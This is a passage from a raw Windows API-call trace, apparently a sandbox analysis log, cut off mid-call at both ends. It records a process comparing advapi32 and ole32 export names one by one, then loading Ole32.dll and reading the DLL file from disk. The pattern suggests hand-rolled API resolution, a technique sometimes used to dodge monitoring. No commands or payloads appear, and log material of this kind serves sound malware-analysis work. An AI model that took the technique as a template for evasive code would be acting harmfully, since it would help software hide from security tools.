(lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckByType") returned 1 [0126.964] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0126.964] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0126.964] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckByTypeResultList") returned 1 [0126.964] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0126.964] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0126.964] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 0 [0126.965] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="A_SHAFinal") returned 1 [0126.965] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="A_SHAInit") returned 1 [0126.965] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="A_SHAUpdate") returned 1 [0126.965] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AbortSystemShutdownA") returned 1 [0126.965] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AbortSystemShutdownW") returned 1 [0126.965] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheck") returned 1 [0126.965] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0126.965] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0126.965] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByType") returned 1 [0126.965] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0126.965] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0126.965] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByTypeResultList") returned 1 [0126.965] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0126.965] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0126.965] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 1 [0126.965] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByTypeResultListAndAuditAlarmW") returned 0 [0126.965] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="A_SHAFinal") returned 1 [0126.965] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="A_SHAInit") returned 1 [0126.965] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="A_SHAUpdate") returned 1 [0126.965] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AbortSystemShutdownA") returned 1 [0126.965] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AbortSystemShutdownW") returned 1 [0126.965] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheck") returned 1 [0126.965] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0126.965] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0126.965] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByType") returned 1 [0126.966] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0126.966] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0126.966] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByTypeResultList") returned 1 [0126.966] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0126.966] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0126.966] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 1 [0126.966] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmW") returned 1 [0126.966] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AddAccessAllowedAce") returned 0 [0126.966] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="A_SHAFinal") returned 1 [0126.966] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="A_SHAInit") returned 1 [0126.966] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="A_SHAUpdate") returned 1 [0126.966] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AbortSystemShutdownA") returned 1 [0126.966] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AbortSystemShutdownW") returned 1 [0126.966] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheck") returned 1 [0126.966] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0126.966] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0126.966] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByType") returned 1 [0126.966] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0126.966] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0126.966] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByTypeResultList") returned 1 [0126.966] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0126.967] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0126.967] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 1 [0126.967] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmW") returned 1 [0126.967] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AddAccessAllowedAce") returned 1 [0126.967] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AddAccessAllowedAceEx") returned 0 [0126.967] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="A_SHAFinal") returned 1 [0126.967] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="A_SHAInit") returned 1 [0126.967] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="A_SHAUpdate") returned 1 [0126.967] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AbortSystemShutdownA") returned 1 [0126.967] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AbortSystemShutdownW") returned 1 [0126.967] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheck") returned 1 [0126.967] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0126.967] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0126.967] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByType") returned 1 [0126.967] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0126.967] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0126.967] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByTypeResultList") returned 1 [0126.967] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0126.967] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0126.967] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 1 [0126.967] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmW") returned 1 [0126.967] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AddAccessAllowedAce") returned 1 [0126.968] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AddAccessAllowedAceEx") returned 1 [0126.968] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AddAccessAllowedObjectAce") returned 0 [0126.968] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="A_SHAFinal") returned 1 [0126.968] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="A_SHAInit") returned 1 [0126.968] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="A_SHAUpdate") returned 1 [0126.968] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AbortSystemShutdownA") returned 1 [0126.968] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AbortSystemShutdownW") returned 1 [0126.968] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheck") returned 1 [0126.968] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0126.968] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0126.968] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByType") returned 1 [0126.968] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0126.968] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0126.968] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByTypeResultList") returned 1 [0126.968] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0126.968] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0126.968] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 1 [0126.968] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmW") returned 1 [0126.968] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AddAccessAllowedAce") returned 1 [0126.968] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AddAccessAllowedAceEx") returned 1 [0126.968] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AddAccessAllowedObjectAce") returned 1 [0126.968] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AddAccessDeniedAce") returned 0 [0126.968] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="A_SHAFinal") returned 1 [0126.968] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="A_SHAInit") returned 1 [0126.968] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="A_SHAUpdate") returned 1 [0126.968] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AbortSystemShutdownA") returned 1 [0126.969] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AbortSystemShutdownW") returned 1 [0126.969] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheck") returned 1 [0126.969] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0126.969] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0126.969] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByType") returned 1 [0126.969] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0126.969] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0126.969] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByTypeResultList") returned 1 [0126.969] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0126.969] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0126.969] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 1 [0126.969] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmW") returned 1 [0126.969] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AddAccessAllowedAce") returned 1 [0126.969] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AddAccessAllowedAceEx") returned 1 [0126.969] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AddAccessAllowedObjectAce") returned 1 [0126.969] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AddAccessDeniedAce") returned 1 [0126.969] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AddAccessDeniedAceEx") returned 0 [0126.969] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="A_SHAFinal") returned 1 [0126.969] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="A_SHAInit") returned 1 [0126.969] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="A_SHAUpdate") returned 1 [0126.970] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AbortSystemShutdownA") returned 1 [0126.970] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AbortSystemShutdownW") returned 1 [0126.970] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheck") returned 1 [0126.970] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0126.970] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0126.970] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByType") returned 1 [0126.970] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0126.970] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0126.970] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByTypeResultList") returned 1 [0126.970] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0126.970] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0126.970] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 1 [0126.970] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmW") returned 1 [0126.970] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AddAccessAllowedAce") returned 1 [0126.970] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AddAccessAllowedAceEx") returned 1 [0126.970] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AddAccessAllowedObjectAce") returned 1 [0126.970] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AddAccessDeniedAce") returned 1 [0126.970] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AddAccessDeniedAceEx") returned 1 [0126.970] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AddAccessDeniedObjectAce") returned 0 [0126.970] lstrcmpA (lpString1="AddAce", lpString2="A_SHAFinal") returned 1 [0126.970] lstrcmpA (lpString1="AddAce", lpString2="A_SHAInit") returned 1 [0127.769] GetProcessHeap () returned 0x430000 [0127.769] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2d62010 | out: hHeap=0x430000) returned 1 [0127.776] GetProcessHeap () returned 0x430000 [0127.776] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x10) returned 0x4492c0 [0127.777] LoadLibraryA (lpLibFileName="Ole32.dll") returned 0x7ffc5e3e0000 [0127.777] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0127.778] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0127.778] GetModuleFileNameA (in: hModule=0x7ffc5e3e0000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")) returned 0x1d [0127.778] CreateFileA (lpFileName="C:\\Windows\\system32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0127.778] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0127.778] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0127.778] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=1322240) returned 1 [0127.778] GetProcessHeap () returned 0x430000 [0127.778] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x142d00) returned 0x4129040 [0127.814] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0127.814] ReadFile (in: hFile=0x140, lpBuffer=0x4129040, nNumberOfBytesToRead=0x142d00, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x4129040*, lpNumberOfBytesRead=0x14f5a4*=0x142d00, lpOverlapped=0x0) returned 1 [0128.044] CloseHandle (hObject=0x140) returned 1 [0128.045] lstrcmpA (lpString1="BindMoniker", lpString2="BindMoniker") returned 0 [0128.045] lstrcmpA (lpString1="CLIPFORMAT_UserFreeExt", lpString2="BindMoniker") returned 1 [0128.045] lstrcmpA (lpString1="CLIPFORMAT_UserFreeExt", lpString2="CLIPFORMAT_UserFree") returned 1 [0128.045] lstrcmpA (lpString1="CLIPFORMAT_UserFreeExt", lpString2="CLIPFORMAT_UserFree64") returned 1 [0128.045] lstrcmpA (lpString1="CLIPFORMAT_UserFreeExt", lpString2="CLIPFORMAT_UserFreeExt") returned 0 [0128.045] lstrcmpA (lpString1="CLIPFORMAT_UserMarshalExt", lpString2="BindMoniker") returned 1 [0128.045] lstrcmpA (lpString1="CLIPFORMAT_UserMarshalExt", lpString2="CLIPFORMAT_UserFree") returned 1 [0128.045] lstrcmpA (lpString1="CLIPFORMAT_UserMarshalExt", lpString2="CLIPFORMAT_UserFree64") returned 1 [0128.045] lstrcmpA (lpString1="CLIPFORMAT_UserMarshalExt", lpString2="CLIPFORMAT_UserFreeExt") returned 1 [0128.045] lstrcmpA (lpString1="CLIPFORMAT_UserMarshalExt", lpString2="CLIPFORMAT_UserMarshal") returned 1 [0128.045] lstrcmpA (lpString1="CLIPFORMAT_UserMarshalExt", lpString2="CLIPFORMAT_UserMarshal64") returned 1 [0128.045] lstrcmpA (lpString1="CLIPFORMAT_UserMarshalExt", lpString2="CLIPFORMAT_UserMarshalExt") returned 0 [0128.045] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="BindMoniker") returned 1 [0128.045] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserFree") returned 1 [0128.045] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserFree64") returned 1 [0128.045] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserFreeExt") returned 1 [0128.045] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserMarshal") returned 1 [0128.045] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserMarshal64") returned 1 [0128.045] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserMarshalExt") returned 1 [0128.045] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserSize") returned 1 [0128.045] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserSize64") returned 1 [0128.046] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserSizeExt") returned 0 [0128.046] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="BindMoniker") returned 1 [0128.046] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserFree") returned 1 [0128.046] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserFree64") returned 1 [0128.048] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserFreeExt") returned 1 [0128.048] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserMarshal") returned 1 [0128.049] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserMarshal64") returned 1 [0128.049] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserMarshalExt") returned 1 [0128.049] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserSize") returned 1 [0128.049] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserSize64") returned 1 [0128.049] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserSizeExt") returned 1 [0128.049] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserUnmarshal") returned 1 [0128.049] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserUnmarshal64") returned 1 [0128.049] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserUnmarshalExt") returned 0 [0128.049] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="BindMoniker") returned 1 [0128.049] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserFree") returned 1 [0128.049] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserFree64") returned 1 [0128.049] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserFreeExt") returned 1 [0128.049] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserMarshal") returned 1 [0128.049] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserMarshal64") returned 1 [0128.049] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserMarshalExt") returned 1 [0128.049] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserSize") returned 1 [0128.049] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserSize64") returned 1 [0128.049] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserSizeExt") returned 1 [0128.049] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserUnmarshal") returned 1 [0128.049] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserUnmarshal64") returned 1 [0128.050] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserUnmarshalExt") returned 1 [0128.050] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLSIDFromOle1Class") returned 1 [0128.050] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLSIDFromProgID") returned 1 [0128.050] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLSIDFromProgIDEx") returned 0 [0128.050] lstrcmpA (lpString1="CheckInitDde", lpString2="BindMoniker") returned 1 [0128.050] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserFree") returned -1 [0128.050] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserFree64") returned -1 [0128.050] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserFreeExt") returned -1 [0128.050] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserMarshal") returned -1 [0128.050] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserMarshal64") returned -1 [0128.050] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserMarshalExt") returned -1 [0128.050] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserSize") returned -1 [0128.050] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserSize64") returned -1 [0128.050] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserSizeExt") returned -1 [0128.050] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserUnmarshal") returned -1 [0128.050] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserUnmarshal64") returned -1 [0128.050] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserUnmarshalExt") returned -1 [0128.050] lstrcmpA (lpString1="CheckInitDde", lpString2="CLSIDFromOle1Class") returned -1 [0128.050] lstrcmpA (lpString1="CheckInitDde", lpString2="CLSIDFromProgID") returned -1 [0128.050] lstrcmpA (lpString1="CheckInitDde", lpString2="CLSIDFromProgIDEx") returned -1 [0128.050] lstrcmpA (lpString1="CheckInitDde", lpString2="CLSIDFromString") returned -1 [0128.050] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer2_Connect") returned -1 [0128.050] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer2_Disconnect") returned -1 [0128.050] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer2_Release") returned -1 [0128.050] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer_AddRef") returned -1 [0128.050] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer_Connect") returned -1 [0128.051] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer_Disconnect") returned -1 [0128.051] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer_Invoke") returned -1 [0128.051] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer_QueryInterface") returned -1 [0128.051] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer_Release") returned -1 [0128.051] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdStubBuffer2_Connect") returned -1 [0128.051] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdStubBuffer2_CountRefs") returned -1 [0128.051] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdStubBuffer2_Disconnect") returned -1 [0128.051] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdStubBuffer2_QueryInterface") returned -1 [0128.051] lstrcmpA (lpString1="CheckInitDde", lpString2="CheckInitDde") returned 0 [0128.051] lstrcmpA (lpString1="CleanROTForApartment", lpString2="BindMoniker") returned 1 [0128.051] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserFree") returned -1 [0128.051] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserFree64") returned -1 [0128.051] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserFreeExt") returned -1 [0128.051] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserMarshal") returned -1 [0128.051] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserMarshal64") returned -1 [0128.051] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserMarshalExt") returned -1 [0128.051] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserSize") returned -1 [0128.051] lstrcmpA (lpString1="CleanROTForApartment", 